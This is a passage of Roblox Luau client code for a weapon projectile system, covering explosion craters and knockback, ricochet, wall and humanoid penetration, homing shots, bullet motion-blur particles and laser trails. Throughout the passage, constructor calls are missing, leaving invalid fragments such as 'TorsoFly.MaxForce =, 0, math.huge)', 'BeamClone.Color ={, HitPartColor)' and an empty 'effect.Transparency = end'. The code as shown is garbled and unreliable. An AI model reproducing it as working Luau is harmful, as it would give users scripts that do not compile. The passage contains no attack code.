"rbxassetid://"..Texture[math.random(1,#Texture)] if AddressTableValue(Cast.UserData.ClientModule.ChargedShotAdvanceEnabled, Cast.UserData.Misc.ChargeLevel, Cast.UserData.ClientModule.ChargeAlterTable.ExplosionCraterPartColor, Cast.UserData.ClientModule.ExplosionCraterPartColor) then local HitPartColor = RaycastResult.Instance and RaycastResult.Instance.Color or Color3.fromRGB(255, 255, 255) if RaycastResult.Instance and RaycastResult.Instance:IsA("Terrain") then HitPartColor = Workspace.Terrain:GetMaterialColor(RaycastResult.Material or Enum.Material.Sand) end BeamClone.Color ={, HitPartColor),, HitPartColor)}) end BeamClone.Attachment0 = A0 BeamClone.Attachment1 = A1 A0.Parent = RaycastResult.Instance A1.Parent = RaycastResult.Instance A0.WorldCFrame = Hole.WorldCFrame * / 2, -0.01, 0) * CFrame.Angles(math.rad(90), 0, 0) A1.WorldCFrame = Hole.WorldCFrame * / 2, -0.01, 0) * CFrame.Angles(math.rad(90), math.rad(180), 0) BeamClone.Parent = Workspace.Terrain local VisibleTime = AddressTableValue(Cast.UserData.ClientModule.ChargedShotAdvanceEnabled, Cast.UserData.Misc.ChargeLevel, Cast.UserData.ClientModule.ChargeAlterTable.ExplosionCraterVisibleTime, Cast.UserData.ClientModule.ExplosionCraterVisibleTime) local FadeTime = AddressTableValue(Cast.UserData.ClientModule.ChargedShotAdvanceEnabled, Cast.UserData.Misc.ChargeLevel, Cast.UserData.ClientModule.ChargeAlterTable.ExplosionCraterFadeTime, Cast.UserData.ClientModule.ExplosionCraterFadeTime) Thread:Delay(VisibleTime, function() FadeBeam(A0, A1, BeamClone, Hole, FadeTime, Cast.UserData.Replicate) end) else Debris:AddItem(Hole, 5) end end end end end if Cast.UserData.ClientModule.CustomExplosion then Explosion.Visible = false if ShowEffects then local Attachment ="Attachment") Attachment.CFrame = SurfaceCF Attachment.Parent = Workspace.Terrain for i, v in pairs(Cast.UserData.Misc.ExplosionEffectFolder:GetChildren()) do if v.ClassName == "ParticleEmitter" then local Count = 1 local Particle = v:Clone() Particle.Parent = Attachment if Particle:FindFirstChild("EmitCount") then Count = Particle.EmitCount.Value end Thread:Delay(0.01, function() EmitParticle(Particle, Count) Debris:AddItem(Particle, Particle.Lifetime.Max) end) end end Debris:AddItem(Attachment, 10) end end local HitHumanoids = {} Explosion.Hit:Connect(function(HitPart, HitDist) if HitPart and Cast.UserData.Replicate then if HitPart.Parent and HitPart.Name == "HumanoidRootPart" or HitPart.Name == "Head" then local Target = HitPart:FindFirstAncestorOfClass("Model") local TargetHumanoid = Target and Target:FindFirstChildOfClass("Humanoid") local TargetTorso = Target and (Target:FindFirstChild("HumanoidRootPart") or Target:FindFirstChild("Head")) if TargetHumanoid and TargetTorso then if TargetHumanoid.Health > 0 then if not HitHumanoids[TargetHumanoid] then if Cast.UserData.ClientModule.ExplosionKnockback then local Multipler = AddressTableValue(Cast.UserData.ClientModule.ChargedShotAdvanceEnabled, Cast.UserData.Misc.ChargeLevel, Cast.UserData.ClientModule.ChargeAlterTable.ExplosionKnockbackMultiplierOnTarget, Cast.UserData.ClientModule.ExplosionKnockbackMultiplierOnTarget) local DistanceFactor = HitDist / AddressTableValue(Cast.UserData.ClientModule.ChargedShotAdvanceEnabled, Cast.UserData.Misc.ChargeLevel, Cast.UserData.ClientModule.ChargeAlterTable.ExplosionRadius, Cast.UserData.ClientModule.ExplosionRadius) DistanceFactor = 1 - DistanceFactor local VelocityMod = (TargetTorso.Position - Explosion.Position).Unit * AddressTableValue(Cast.UserData.ClientModule.ChargedShotAdvanceEnabled, Cast.UserData.Misc.ChargeLevel, Cast.UserData.ClientModule.ChargeAlterTable.ExplosionKnockbackPower, Cast.UserData.ClientModule.ExplosionKnockbackPower) --* DistanceFactor local AirVelocity = TargetTorso.Velocity -, TargetTorso.Velocity.y, 0) +, 0, VelocityMod.Z) if DamageModule.CanDamage(Target, Cast.UserData.Character, Cast.UserData.ClientModule.FriendlyFire) then local TorsoFly ="BodyVelocity") TorsoFly.MaxForce =, 0, math.huge) TorsoFly.Velocity = AirVelocity TorsoFly.Parent = TargetTorso TargetTorso.Velocity = TargetTorso.Velocity +, VelocityMod.Y * Multipler, 0) Debris:AddItem(TorsoFly, 0.25) else if TargetHumanoid.Parent.Name == Player.Name then Multipler = AddressTableValue(Cast.UserData.ClientModule.ChargedShotAdvanceEnabled, Cast.UserData.Misc.ChargeLevel, Cast.UserData.ClientModule.ChargeAlterTable.ExplosionKnockbackMultiplierOnPlayer, Cast.UserData.ClientModule.ExplosionKnockbackMultiplierOnPlayer) local TorsoFly ="BodyVelocity") TorsoFly.MaxForce =, 0, math.huge) TorsoFly.Velocity = AirVelocity TorsoFly.Parent = TargetTorso TargetTorso.Velocity = TargetTorso.Velocity +, VelocityMod.Y * Multipler, 0) Debris:AddItem(TorsoFly, 0.25) end end end local Part = RaycastResult and RaycastResult.Instance or HitPart Thread:Spawn(function() InflictTarget:InvokeServer("Gun", Cast.UserData.Tool, Cast.UserData.ClientModule, TargetHumanoid, TargetTorso, Part, Part.Size, Cast.UserData.Misc, HitDist) end) if Cast.UserData.Tool and Cast.UserData.Tool.GunClient:FindFirstChild("MarkerEvent") then Cast.UserData.Tool.GunClient.MarkerEvent:Fire(Cast.UserData.ClientModule, Part.Name == "Head" and Cast.UserData.ClientModule.HeadshotHitmarker) end HitHumanoids[TargetHumanoid] = true end end end elseif HitPart.Name == "_glass" and AddressTableValue(Cast.UserData.ClientModule.ChargedShotAdvanceEnabled, Cast.UserData.Misc.ChargeLevel, Cast.UserData.ClientModule.ChargeAlterTable.CanBreakGlass, Cast.UserData.ClientModule.CanBreakGlass) then ShatterGlass:FireServer(HitPart, HitPart.Position, Direction) end end end) end end local function OnRayHit(Cast, Origin, Direction, RaycastResult, SegmentVelocity, CosmeticBulletObject) local CanBounce = Cast.UserData.CastBehavior.Hitscan and true or false local CurrentPosition = Cast:GetPosition() local CurrentVelocity = Cast:GetVelocity() local Acceleration = Cast.UserData.CastBehavior.Acceleration if not Cast.UserData.CastBehavior.Hitscan then Cast.UserData.SpinData.InitalTick = os.clock() Cast.UserData.SpinData.InitalAngularVelocity = RaycastResult.Normal:Cross(CurrentVelocity) / 0.2 Cast.UserData.SpinData.InitalRotation = (Cast.RayInfo.CurrentCFrame - Cast.RayInfo.CurrentCFrame.p) Cast.UserData.SpinData.ProjectileOffset = 0.2 * RaycastResult.Normal if CurrentVelocity.Magnitude > 0 then local NormalizeBounce = false local Position = Cast.RayInfo.RaycastHitbox and CurrentPosition or RaycastResult.Position if Cast.UserData.BounceData.BounceBetweenHumanoids then local Target = RaycastResult.Instance:FindFirstAncestorOfClass("Model") local TargetHumanoid = Target and Target:FindFirstChildOfClass("Humanoid") local TargetTorso = Target and (Target:FindFirstChild("HumanoidRootPart") or Target:FindFirstChild("Head")) if TargetHumanoid and TargetHumanoid.Health > 0 and TargetTorso then if not table.find(Cast.UserData.BounceData.BouncedHumanoids, TargetHumanoid) then table.insert(Cast.UserData.BounceData.BouncedHumanoids, TargetHumanoid) end end local TrackedEntity, TrackedHumanoid, TrackedTorso = FindNearestEntity(Cast, Position) if TrackedEntity and TrackedHumanoid and TrackedTorso and TrackedHumanoid.Health > 0 then local DesiredVector = (TrackedTorso.Position - Position).Unit if Cast.UserData.BounceData.PredictDirection then local Pos, Vel = DirectionPredictor(Position, TrackedTorso.Position,, TrackedTorso.Velocity, Acceleration, (2 * TrackedTorso.Velocity) / 3, SegmentVelocity.Magnitude) if Pos and Vel then DesiredVector = Vel.Unit end end Cast:SetVelocity(DesiredVector * SegmentVelocity.Magnitude) Cast:SetPosition(Position) else NormalizeBounce = true end else NormalizeBounce = true end if NormalizeBounce then local Delta = Position - CurrentPosition local Fix = 1 - 0.001 / Delta.Magnitude Fix = Fix < 0 and 0 or Fix Cast:AddPosition(Fix * Delta + 0.05 * RaycastResult.Normal) local NewNormal = RaycastResult.Normal local NewVelocity = CurrentVelocity if Cast.UserData.BounceData.IgnoreSlope and (Acceleration ~=, 0, 0) and Acceleration.Y < 0) then local NewPosition = Cast:GetPosition() NewVelocity =, -Cast.UserData.BounceData.BounceHeight, CurrentVelocity.Z) local Instance2, Position2, Normal2, Material2 = CastWithBlacklist(Cast, NewPosition,, 1, 0), Cast.UserData.IgnoreList, true) if Instance2 then NewVelocity =, Cast.UserData.BounceData.BounceHeight, CurrentVelocity.Z) end local X = math.deg(math.asin(RaycastResult.Normal.X)) local Z = math.deg(math.asin(RaycastResult.Normal.Z)) local FloorAngle = math.floor(math.max(X == 0 and Z or X, X == 0 and -Z or -X)) NewNormal = FloorAngle > 0 and (FloorAngle >= Cast.UserData.BounceData.SlopeAngle and RaycastResult.Normal or, RaycastResult.Normal.Y, 0)) or RaycastResult.Normal end local NormalVelocity =, NewVelocity) * NewNormal local TanVelocity = NewVelocity - NormalVelocity local GeometricDeceleration local D1 =, Acceleration) local D2 = -(1 + Cast.UserData.BounceData.BounceElasticity) *, NewVelocity) GeometricDeceleration = 1 - Cast.UserData.BounceData.FrictionConstant * (10 * (D1 < 0 and 0 or D1) * Cast.StateInfo.Delta + (D2 < 0 and 0 or D2)) / TanVelocity.Magnitude Cast:SetVelocity((GeometricDeceleration < 0 and 0 or GeometricDeceleration) * TanVelocity - Cast.UserData.BounceData.BounceElasticity * NormalVelocity) end CanBounce = true end else local NormalizeBounce = false if Cast.UserData.BounceData.BounceBetweenHumanoids then local Target = RaycastResult.Instance:FindFirstAncestorOfClass("Model") local TargetHumanoid = Target and Target:FindFirstChildOfClass("Humanoid") local TargetTorso = Target and (Target:FindFirstChild("HumanoidRootPart") or Target:FindFirstChild("Head")) if TargetHumanoid and TargetHumanoid.Health > 0 and TargetTorso then if not table.find(Cast.UserData.BounceData.BouncedHumanoids, TargetHumanoid) then table.insert(Cast.UserData.BounceData.BouncedHumanoids, TargetHumanoid) end end local TrackedEntity, TrackedHumanoid, TrackedTorso = FindNearestEntity(Cast, RaycastResult.Position) if TrackedEntity and TrackedHumanoid and TrackedTorso and TrackedHumanoid.Health > 0 then local DesiredVector = (TrackedTorso.Position - RaycastResult.Position).Unit Cast.RayInfo.ModifiedDirection = DesiredVector else NormalizeBounce = true end else NormalizeBounce = true end if NormalizeBounce then local CurrentDirection = Cast.RayInfo.ModifiedDirection local NewDirection = CurrentDirection - (2 * CurrentDirection:Dot(RaycastResult.Normal) * RaycastResult.Normal) Cast.RayInfo.ModifiedDirection = NewDirection end end if CanBounce then if Cast.UserData.BounceData.CurrentBounces > 0 then Cast.UserData.BounceData.CurrentBounces -= 1 local ShowEffects = CanShowEffects(RaycastResult.Position) if Cast.UserData.BounceData.NoExplosionWhileBouncing then if RaycastResult.Instance.Name == "_glass" and AddressTableValue(Cast.UserData.ClientModule.ChargedShotAdvanceEnabled, Cast.UserData.Misc.ChargeLevel, Cast.UserData.ClientModule.ChargeAlterTable.CanBreakGlass, Cast.UserData.ClientModule.CanBreakGlass) then if Cast.UserData.Replicate then ShatterGlass:FireServer(RaycastResult.Instance, RaycastResult.Position, SegmentVelocity.Unit) end else if Cast.UserData.ClientModule.BlacklistParts[RaycastResult.Instance.Name] then if ShowEffects then MakeImpactFX(RaycastResult.Instance, RaycastResult.Position, RaycastResult.Normal, RaycastResult.Material, true, Cast.UserData.ClientModule, Cast.UserData.Misc, Cast.UserData.Replicate) end else local Target = RaycastResult.Instance:FindFirstAncestorOfClass("Model") local TargetHumanoid = Target and Target:FindFirstChildOfClass("Humanoid") local Distance = (RaycastResult.Position - Origin).Magnitude local TargetTorso = Target and (Target:FindFirstChild("HumanoidRootPart") or Target:FindFirstChild("Head")) if TargetHumanoid and TargetHumanoid.Health > 0 and TargetTorso then if ShowEffects then MakeBloodFX(RaycastResult.Instance, RaycastResult.Position, RaycastResult.Normal, RaycastResult.Material, true, Cast.UserData.ClientModule, Cast.UserData.Misc, Cast.UserData.Replicate) end if Cast.UserData.Replicate then if TargetHumanoid.Health > 0 then Thread:Spawn(function() InflictTarget:InvokeServer("Gun", Cast.UserData.Tool, Cast.UserData.ClientModule, TargetHumanoid, TargetTorso, RaycastResult.Instance, RaycastResult.Instance.Size, Cast.UserData.Misc, Distance) end) if Cast.UserData.Tool and Cast.UserData.Tool.GunClient:FindFirstChild("MarkerEvent") then Cast.UserData.Tool.GunClient.MarkerEvent:Fire(Cast.UserData.ClientModule, RaycastResult.Instance.Name == "Head" and Cast.UserData.ClientModule.HeadshotHitmarker) end end end else if ShowEffects then MakeImpactFX(RaycastResult.Instance, RaycastResult.Position, RaycastResult.Normal, RaycastResult.Material, true, Cast.UserData.ClientModule, Cast.UserData.Misc, Cast.UserData.Replicate) end end end end else OnRayFinalHit(Cast, Origin, Direction, RaycastResult, SegmentVelocity, CosmeticBulletObject) end end end end local function CanRayHit(Cast, Origin, Direction, RaycastResult, SegmentVelocity, CosmeticBulletObject) if Cast.UserData.ClientModule.BlacklistParts[RaycastResult.Instance.Name] then if Cast.UserData.BounceData.StopBouncingOn == "Object" then return false end else local Target = RaycastResult.Instance:FindFirstAncestorOfClass("Model") local TargetHumanoid = Target and Target:FindFirstChildOfClass("Humanoid") local TargetTorso = Target and (Target:FindFirstChild("HumanoidRootPart") or Target:FindFirstChild("Head")) if TargetHumanoid and TargetHumanoid.Health > 0 and TargetTorso then if Cast.UserData.BounceData.StopBouncingOn == "Humanoid" then return false end else if Cast.UserData.BounceData.StopBouncingOn == "Object" then return false end end end if not Cast.UserData.CastBehavior.Hitscan and Cast.UserData.BounceData.SuperRicochet then return true else if Cast.UserData.BounceData.CurrentBounces > 0 then return true end end return false end local function OnRayExited(Cast, Origin, Direction, RaycastResult, SegmentVelocity, CosmeticBulletObject) if not RayExit then return end if Cast.UserData.PenetrationData then if Cast.UserData.ClientModule.PenetrationType == "WallPenetration" then local ShowEffects = CanShowEffects(RaycastResult.Position) if RaycastResult.Instance and RaycastResult.Instance.Parent then if RaycastResult.Instance.Name == "_glass" and AddressTableValue(Cast.UserData.ClientModule.ChargedShotAdvanceEnabled, Cast.UserData.Misc.ChargeLevel, Cast.UserData.ClientModule.ChargeAlterTable.CanBreakGlass, Cast.UserData.ClientModule.CanBreakGlass) then return else if Cast.UserData.ClientModule.BlacklistParts[RaycastResult.Instance.Name] then if ShowEffects then MakeImpactFX(RaycastResult.Instance, RaycastResult.Position, RaycastResult.Normal, RaycastResult.Material, true, Cast.UserData.ClientModule, Cast.UserData.Misc, Cast.UserData.Replicate) end else local Target = RaycastResult.Instance:FindFirstAncestorOfClass("Model") local TargetHumanoid = Target and Target:FindFirstChildOfClass("Humanoid") local TargetTorso = Target and (Target:FindFirstChild("HumanoidRootPart") or Target:FindFirstChild("Head")) if TargetHumanoid and TargetHumanoid.Health > 0 and TargetTorso then if ShowEffects then MakeBloodFX(RaycastResult.Instance, RaycastResult.Position, RaycastResult.Normal, RaycastResult.Material, true, Cast.UserData.ClientModule, Cast.UserData.Misc, Cast.UserData.Replicate) end else if ShowEffects then MakeImpactFX(RaycastResult.Instance, RaycastResult.Position, RaycastResult.Normal, RaycastResult.Material, true, Cast.UserData.ClientModule, Cast.UserData.Misc, Cast.UserData.Replicate) end end end end end end end if RaycastResult.Instance and RaycastResult.Instance.Parent then local vis = Cast:DbgVisualizeHit(, true) if (vis ~= nil) then vis.Color3 = Color3.fromRGB(13, 105, 172) end end end local function CanRayPenetrate(Cast, Origin, Direction, RaycastResult, SegmentVelocity, CosmeticBulletObject) local ShowEffects = CanShowEffects(RaycastResult.Position) if RaycastResult.Instance and RaycastResult.Instance.Parent then if Cast.UserData.ClientModule.IgnoreBlacklistedParts and Cast.UserData.ClientModule.BlacklistParts[RaycastResult.Instance.Name] then return true else local Target = RaycastResult.Instance:FindFirstAncestorOfClass("Model") local TargetHumanoid = Target and Target:FindFirstChildOfClass("Humanoid") local TargetTool = RaycastResult.Instance:FindFirstAncestorOfClass("Tool") if (RaycastResult.Instance.Transparency > 0.75 or RaycastResult.Instance.Name == "Missile" or RaycastResult.Instance.Name == "Handle" or RaycastResult.Instance.Name == "Effect" or RaycastResult.Instance.Name == "Bullet" or RaycastResult.Instance.Name == "Laser" or string.lower(RaycastResult.Instance.Name) == "water" or RaycastResult.Instance.Name == "Rail" or RaycastResult.Instance.Name == "Arrow" or (TargetHumanoid and (TargetHumanoid.Health <= 0 or not DamageModule.CanDamage(Target, Cast.UserData.Character, Cast.UserData.ClientModule.FriendlyFire) or (Cast.UserData.PenetrationData and table.find(Cast.UserData.PenetrationData.HitHumanoids, TargetHumanoid)) or (Cast.UserData.BounceData and table.find(Cast.UserData.BounceData.BouncedHumanoids, TargetHumanoid)))) or TargetTool) then return true else if Cast.UserData.PenetrationData then if Cast.UserData.ClientModule.PenetrationType == "WallPenetration" then if Cast.UserData.PenetrationData.PenetrationDepth <= 0 then return false end elseif Cast.UserData.ClientModule.PenetrationType == "HumanoidPenetration" then if Cast.UserData.PenetrationData.PenetrationAmount <= 0 then return false end end local MaxExtent = RaycastResult.Instance.Size.Magnitude * Direction local ExitHit, ExitPoint, ExitNormal, ExitMaterial = Workspace:FindPartOnRayWithWhitelist( + MaxExtent, -MaxExtent), {RaycastResult.Instance}, Cast.RayInfo.Parameters.IgnoreWater) local Dist = (ExitPoint - RaycastResult.Position).Magnitude if RaycastResult.Instance.Name == "_glass" and AddressTableValue(Cast.UserData.ClientModule.ChargedShotAdvanceEnabled, Cast.UserData.Misc.ChargeLevel, Cast.UserData.ClientModule.ChargeAlterTable.CanBreakGlass, Cast.UserData.ClientModule.CanBreakGlass) then if Cast.UserData.Replicate then ShatterGlass:FireServer(RaycastResult.Instance, RaycastResult.Position, SegmentVelocity.Unit) end if Cast.UserData.ClientModule.PenetrationType == "WallPenetration" then local ToReduce = 1 - ((Dist / Cast.UserData.PenetrationData.PenetrationDepth / 1.1)) Cast.UserData.PenetrationData.PenetrationDepth *= ToReduce return true end else if Cast.UserData.ClientModule.BlacklistParts[RaycastResult.Instance.Name] then if Cast.UserData.ClientModule.PenetrationType == "WallPenetration" then if ShowEffects then MakeImpactFX(RaycastResult.Instance, RaycastResult.Position, RaycastResult.Normal, RaycastResult.Material, true, Cast.UserData.ClientModule, Cast.UserData.Misc, Cast.UserData.Replicate) end local ToReduce = 1 - ((Dist / Cast.UserData.PenetrationData.PenetrationDepth / 1.1)) Cast.UserData.PenetrationData.PenetrationDepth *= ToReduce if ExitHit then OnRayExited(Cast, RaycastResult.Position + MaxExtent, -MaxExtent, {Instance = ExitHit, Position = ExitPoint, Normal = ExitNormal, Material = ExitMaterial}, SegmentVelocity, CosmeticBulletObject) end return true end else local Distance = (RaycastResult.Position - Origin).Magnitude local TargetTorso = Target and (Target:FindFirstChild("HumanoidRootPart") or Target:FindFirstChild("Head")) if TargetHumanoid and TargetHumanoid.Health > 0 and TargetTorso then if not table.find( Cast.UserData.PenetrationData.HitHumanoids, TargetHumanoid) then table.insert(Cast.UserData.PenetrationData.HitHumanoids, TargetHumanoid) if ShowEffects then MakeBloodFX(RaycastResult.Instance, RaycastResult.Position, RaycastResult.Normal, RaycastResult.Material, true, Cast.UserData.ClientModule, Cast.UserData.Misc, Cast.UserData.Replicate) end if Cast.UserData.Replicate then if TargetHumanoid.Health > 0 then Thread:Spawn(function() InflictTarget:InvokeServer("Gun", Cast.UserData.Tool, Cast.UserData.ClientModule, TargetHumanoid, TargetTorso, RaycastResult.Instance, RaycastResult.Instance.Size, Cast.UserData.Misc, Distance) end) if Cast.UserData.Tool and Cast.UserData.Tool.GunClient:FindFirstChild("MarkerEvent") then Cast.UserData.Tool.GunClient.MarkerEvent:Fire(Cast.UserData.ClientModule, RaycastResult.Instance.Name == "Head" and Cast.UserData.ClientModule.HeadshotHitmarker) end end end if Cast.UserData.ClientModule.PenetrationType == "WallPenetration" then local ToReduce = 1 - ((Dist / Cast.UserData.PenetrationData.PenetrationDepth / 1.1)) Cast.UserData.PenetrationData.PenetrationDepth *= ToReduce if ExitHit then OnRayExited(Cast, RaycastResult.Position + MaxExtent, -MaxExtent, {Instance = ExitHit, Position = ExitPoint, Normal = ExitNormal, Material = ExitMaterial}, SegmentVelocity, CosmeticBulletObject) end elseif Cast.UserData.ClientModule.PenetrationType == "HumanoidPenetration" then Cast.UserData.PenetrationData.PenetrationAmount -= 1 end if Cast.UserData.PenetrationData.PenetrationIgnoreDelay ~= math.huge then Thread:Delay(Cast.UserData.PenetrationData.PenetrationIgnoreDelay, function() local Index = table.find( Cast.UserData.PenetrationData.HitHumanoids, TargetHumanoid) if Index then table.remove(Cast.UserData.PenetrationData.HitHumanoids, Index) end end) end return true end else if Cast.UserData.ClientModule.PenetrationType == "WallPenetration" then if ShowEffects then MakeImpactFX(RaycastResult.Instance, RaycastResult.Position, RaycastResult.Normal, RaycastResult.Material, true, Cast.UserData.ClientModule, Cast.UserData.Misc, Cast.UserData.Replicate) end local ToReduce = 1 - ((Dist / Cast.UserData.PenetrationData.PenetrationDepth / 1.1)) Cast.UserData.PenetrationData.PenetrationDepth *= ToReduce if ExitHit then OnRayExited(Cast, RaycastResult.Position + MaxExtent, -MaxExtent, {Instance = ExitHit, Position = ExitPoint, Normal = ExitNormal, Material = ExitMaterial}, SegmentVelocity, CosmeticBulletObject) end return true end end end end end end end end return false end local function UpdateParticle(Cast, Position, LastPosition, W2) if Cast.UserData.BulletParticleData.MotionBlur then local T2 = os.clock() local P2 =, W2) local V2 if Cast.UserData.BulletParticleData.T0 then V2 = 2 / (T2 - Cast.UserData.BulletParticleData.T1) * (P2 - Cast.UserData.BulletParticleData.P1) - (P2 - Cast.UserData.BulletParticleData.P0) / (T2 - Cast.UserData.BulletParticleData.T0) else V2 = (P2 - Cast.UserData.BulletParticleData.P1) / (T2 - Cast.UserData.BulletParticleData.T1) Cast.UserData.BulletParticleData.V1 = V2 end Cast.UserData.BulletParticleData.T0, Cast.UserData.BulletParticleData.V0, Cast.UserData.BulletParticleData.P0 = Cast.UserData.BulletParticleData.T1, Cast.UserData.BulletParticleData.V1, Cast.UserData.BulletParticleData.P1 Cast.UserData.BulletParticleData.T1, Cast.UserData.BulletParticleData.V1, Cast.UserData.BulletParticleData.P1 = T2, V2, P2 local Dt = Cast.UserData.BulletParticleData.T1 - Cast.UserData.BulletParticleData.T0 local M0 = Cast.UserData.BulletParticleData.V0.Magnitude local M1 = Cast.UserData.BulletParticleData.V1.Magnitude Cast.UserData.BulletParticleData.Attachment0.Position = Camera.CFrame * Cast.UserData.BulletParticleData.P0 Cast.UserData.BulletParticleData.Attachment1.Position = Camera.CFrame * Cast.UserData.BulletParticleData.P1 if M0 > 1.0E-8 then Cast.UserData.BulletParticleData.Attachment0.Axis =, Cast.UserData.BulletParticleData.V0 / M0) end if M1 > 1.0E-8 then Cast.UserData.BulletParticleData.Attachment1.Axis =, Cast.UserData.BulletParticleData.V1 / M1) end local Dist0 = -Cast.UserData.BulletParticleData.P0.Z local Dist1 = -Cast.UserData.BulletParticleData.P1.Z if Dist0 < 0 then Dist0 = 0 end if Dist1 < 0 then Dist1 = 0 end local W0 = Cast.UserData.BulletParticleData.BulletSize + Cast.UserData.BulletParticleData.BulletBloom * Dist0 local W1 = Cast.UserData.BulletParticleData.BulletSize + Cast.UserData.BulletParticleData.BulletBloom * Dist1 local L = ((Cast.UserData.BulletParticleData.P1 - Cast.UserData.BulletParticleData.P0) *, 1, 0)).Magnitude local Tr = 1 - 4 * Cast.UserData.BulletParticleData.BulletSize * Cast.UserData.BulletParticleData.BulletSize / ((W0 + W1) * (2 * L + W0 + W1)) * Cast.UserData.BulletParticleData.BulletBrightness for _, effect in next, Cast.UserData.BulletParticleData.Effects do effect.CurveSize0 = Dt / 3 * M0 effect.CurveSize1 = Dt / 3 * M1 effect.Width0 = W0 effect.Width1 = W1 effect.Transparency = end else if (Position - LastPosition).Magnitude > 0 then local Rotation =, Position) - LastPosition local Offset = CFrame.Angles(0, math.pi / 2, 0) Cast.UserData.BulletParticleData.Attachment0.CFrame = * Rotation * Offset Cast.UserData.BulletParticleData.Attachment1.CFrame =, Position) * Offset end end end local function OnRayUpdated(Cast, LastSegmentOrigin, SegmentOrigin, SegmentDirection, Length, SegmentVelocity, CosmeticBulletObject) Cast.UserData.LastSegmentOrigin = LastSegmentOrigin Cast.UserData.SegmentOrigin = SegmentOrigin Cast.UserData.SegmentDirection = SegmentDirection Cast.UserData.SegmentVelocity = SegmentVelocity local Tick = os.clock() - Cast.UserData.SpinData.InitalTick if Cast.UserData.UpdateData.UpdateRayInExtra then if Cast.UserData.UpdateData.ExtraRayUpdater then Cast.UserData.UpdateData.ExtraRayUpdater(Cast, Cast.StateInfo.Delta) end end if not Cast.UserData.CastBehavior.Hitscan and Cast.UserData.HomeData.Homing then local CurrentPosition = Cast:GetPosition() local CurrentVelocity = Cast:GetVelocity() if Cast.UserData.HomeData.LockOnOnHovering then if Cast.UserData.HomeData.LockedEntity then local TargetHumanoid = Cast.UserData.HomeData.LockedEntity:FindFirstChildOfClass("Humanoid") if TargetHumanoid and TargetHumanoid.Health > 0 then local TargetTorso = Cast.UserData.HomeData.LockedEntity:FindFirstChild("HumanoidRootPart") or Cast.UserData.HomeData.LockedEntity:FindFirstChild("Torso") or Cast.UserData.HomeData.LockedEntity:FindFirstChild("UpperTorso") local DesiredVector = (TargetTorso.Position - CurrentPosition).Unit local CurrentVector = CurrentVelocity.Unit local AngularDifference = math.acos(DesiredVector:Dot(CurrentVector)) if AngularDifference > 0 then local OrthoVector = CurrentVector:Cross(DesiredVector).Unit local AngularCorrection = math.min(AngularDifference, Cast.StateInfo.Delta * Cast.UserData.HomeData.TurnRatePerSecond) Cast:SetVelocity(CFrame.fromAxisAngle(OrthoVector, AngularCorrection):vectorToWorldSpace(CurrentVelocity)) end end end else local TargetEntity, TargetHumanoid, TargetTorso = FindNearestEntity(Cast, CurrentPosition) if TargetEntity and TargetHumanoid and TargetTorso and TargetHumanoid.Health > 0 then local DesiredVector = (TargetTorso.Position - CurrentPosition).Unit local CurrentVector = CurrentVelocity.Unit local AngularDifference = math.acos(DesiredVector:Dot(CurrentVector)) if AngularDifference > 0 then local OrthoVector = CurrentVector:Cross(DesiredVector).Unit local AngularCorrection = math.min(AngularDifference, Cast.StateInfo.Delta * Cast.UserData.HomeData.TurnRatePerSecond) Cast:SetVelocity(CFrame.fromAxisAngle(OrthoVector, AngularCorrection):vectorToWorldSpace(CurrentVelocity)) end end end end local TravelCFrame if Cast.UserData.SpinData.CanSpinPart then if not Cast.UserData.CastBehavior.Hitscan then local Position = (SegmentOrigin + Cast.UserData.SpinData.ProjectileOffset) if Cast.UserData.BounceData.SuperRicochet then TravelCFrame =, Position + SegmentVelocity) * Math.FromAxisAngle(Tick * Cast.UserData.SpinData.InitalAngularVelocity) * Cast.UserData.SpinData.InitalRotation else if Cast.UserData.BounceData.CurrentBounces > 0 then TravelCFrame =, Position + SegmentVelocity) * Math.FromAxisAngle(Tick * Cast.UserData.SpinData.InitalAngularVelocity) * Cast.UserData.SpinData.InitalRotation else TravelCFrame =, SegmentOrigin + SegmentVelocity) * CFrame.Angles(math.rad(-360 * ((os.clock() - Cast.UserData.ShootId / 4) * Cast.UserData.SpinData.SpinX - math.floor((os.clock() - Cast.UserData.ShootId / 4) * Cast.UserData.SpinData.SpinX))), math.rad(-360 * ((os.clock() - Cast.UserData.ShootId / 4) * Cast.UserData.SpinData.SpinY - math.floor((os.clock() - Cast.UserData.ShootId / 4) * Cast.UserData.SpinData.SpinY))), math.rad(-360 * ((os.clock() - Cast.UserData.ShootId / 4) * Cast.UserData.SpinData.SpinZ - math.floor((os.clock() - Cast.UserData.ShootId / 4) * Cast.UserData.SpinData.SpinZ)))) end end else TravelCFrame =, SegmentOrigin + SegmentVelocity) * CFrame.Angles(math.rad(-360 * ((os.clock() - Cast.UserData.ShootId / 4) * Cast.UserData.SpinData.SpinX - math.floor((os.clock() - Cast.UserData.ShootId / 4) * Cast.UserData.SpinData.SpinX))), math.rad(-360 * ((os.clock() - Cast.UserData.ShootId / 4) * Cast.UserData.SpinData.SpinY - math.floor((os.clock() - Cast.UserData.ShootId / 4) * Cast.UserData.SpinData.SpinY))), math.rad(-360 * ((os.clock() - Cast.UserData.ShootId / 4) * Cast.UserData.SpinData.SpinZ - math.floor((os.clock() - Cast.UserData.ShootId / 4) * Cast.UserData.SpinData.SpinZ)))) end else TravelCFrame =, SegmentOrigin + SegmentVelocity) end Cast.RayInfo.CurrentCFrame = TravelCFrame if Cast.UserData.BulletParticleData then UpdateParticle(Cast, SegmentOrigin, Cast.UserData.LastPosition, SegmentOrigin) end if Cast.UserData.LaserData.LaserTrailEnabled then if Cast.StateInfo.Delta > 0 then local Width = Cast.UserData.LaserData.LaserTrailWidth local Height = Cast.UserData.LaserData.LaserTrailHeight local TrailSegment = Miscs[Cast.UserData.LaserData.LaserTrailShape.."Segment"]:Clone() if Cast.UserData.LaserData.RandomizeLaserColorIn ~= "None" then if Cast.UserData.LaserData.RandomizeLaserColorIn == "Whole" then TrailSegment.Color = Cast.UserData.LaserData.RandomLaserColor elseif Cast.UserData.LaserData.RandomizeLaserColorIn == "Segment" then TrailSegment.Color =, math.random(), math.random()) end else TrailSegment.Color = Cast.UserData.LaserData.LaserTrailColor end TrailSegment.Material = Cast.UserData.LaserData.LaserTrailMaterial TrailSegment.Reflectance = Cast.UserData.LaserData.LaserTrailReflectance TrailSegment.Transparency = Cast.UserData.LaserData.LaserTrailTransparency TrailSegment.Size = Cast.UserData.LaserData.LaserTrailShape == "Cone" and, (SegmentOrigin - LastSegmentOrigin).Magnitude, Height) or - LastSegmentOrigin).Magnitude, Height, Width) TrailSegment.CFrame = + SegmentOrigin) * 0.5, SegmentOrigin) * (Cast.UserData.LaserData.LaserTrailShape == "Cone" and 